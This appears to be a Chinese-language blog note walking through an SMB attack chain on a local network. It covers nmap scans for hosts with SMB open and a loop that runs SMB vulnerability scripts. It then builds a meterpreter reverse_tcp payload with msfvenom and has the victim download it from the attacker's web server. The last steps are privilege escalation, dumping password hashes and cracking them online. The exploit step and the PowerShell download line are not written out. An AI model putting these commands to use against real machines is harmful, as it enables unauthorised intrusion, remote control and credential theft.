整體思路轉(zhuǎn)自:paper.tuisec.win/detail-119767e6b79612b.html?
掃描C段或B段網(wǎng)段存活主機(jī),www.itdecent.cn/writer#/notebooks/11379001/notes/15623216
或利用nmap掃描存在smb服務(wù)的主機(jī)(這里主要測(cè)試存在smb漏洞的主機(jī))
nmap -A -p 139,445 x.x.x.1-254 -oG smb_service.txt
其中,-A 代表掃描版本號(hào)和系統(tǒng)
-oG 輸出到文件
cat smb_service.txt | grep 'windows' | cut -d " " -f2 > smb_service_host.txt

掃描存在smb漏洞的主機(jī)
find / -name smb*vuln*.nse 查找nse腳本文件
for vul in$(find / -name smb*vuln*.nse | cut -d"/"-f 6);do nmap -v -p 139,445 --script=$vul -iL smb_server_host.txt -oN smb_vulns_$vul.txt;done
nmap -iL 輸入文件
-oN 輸出文件

漏洞利用

若成功,則返回shell
但此shell不穩(wěn)當(dāng),要想辦法獲得meterpreter,獲得更強(qiáng)大的功能
后滲透
得到初步的shell后,檢查目標(biāo)系統(tǒng)的操作系統(tǒng)版本,以生成對(duì)應(yīng)版本的木馬

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=8888 -f exe -a x64 --platform win -o mp_64.exe
上傳meterpreter的木馬到攻擊機(jī)的/var/www/html下,方便下載
重新開(kāi)啟一個(gè)msfconsole并開(kāi)啟監(jiān)聽(tīng)。

重要一步:利用不穩(wěn)當(dāng)?shù)膕hell創(chuàng)建一個(gè)powershell用于下載我們的meterpreter木馬
ps怎么寫(xiě)?(還未研究)
仿照原文作者大牛寫(xiě)的,

下載成功,運(yùn)行木馬文件l.exe,成功獲得meterpreter
meterpreter后滲透,getuid,getsystem(提權(quán))、shell獲取shell,hashdump獲取hash密碼,并可通過(guò)http://www.objectif-securite.ch/en/ophcrack.php一個(gè)在線(xiàn)的LMHash破解網(wǎng)站